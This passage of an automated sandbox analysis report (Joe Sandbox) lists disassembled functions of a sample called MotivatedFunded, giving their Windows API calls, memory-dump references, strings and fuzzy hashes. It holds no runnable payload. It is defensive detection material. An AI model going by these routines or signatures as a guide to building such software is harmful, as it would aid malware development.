                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: *?|<>/":
                                                                    • API String ID: 589700163-165019052
                                                                    • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                    • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                    • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                    • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                    Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: Close$DeleteEnumOpen
                                                                    • String ID:
                                                                    • API String ID: 1912718029-0
                                                                    • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                    • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                    • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                    • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                    Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID:
                                                                    • API String ID: 1849352358-0
                                                                    • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                    • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                    • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                    • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                    Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !
                                                                    • API String ID: 1777923405-2657877971
                                                                    • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                    • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                    • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                    • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                    Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                    • API String ID: 1697273262-1764544995
                                                                    • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                    • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                    • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                    • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                    Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 00404902
                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID: $@rD
                                                                    • API String ID: 3748168415-881980237
                                                                    • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                    • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                    • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                    • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                    Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                      • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                      • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                    • API String ID: 2577523808-3778932970
                                                                    • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                    • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                    • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                    • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                    Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcatwsprintf
                                                                    • String ID: %02x%c$...
                                                                    • API String ID: 3065427908-1057055748
                                                                    • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                    • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                    • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                    • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                    Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 00405057
                                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                    • API String ID: 2266616436-4211696005
                                                                    • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                    • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                    • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                    • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                    Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00402100
                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                    • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                    • String ID:
                                                                    • API String ID: 1599320355-0
                                                                    • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                    • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                    • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                    • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                    Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                    • String ID: Version
                                                                    • API String ID: 512980652-315105994
                                                                    • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                    • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                    • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                    • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                    Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                    • String ID:
                                                                    • API String ID: 2102729457-0
                                                                    • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                    • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                    • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                    • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                    Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                    • String ID:
                                                                    • API String ID: 2883127279-0
                                                                    • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                    • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                    • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
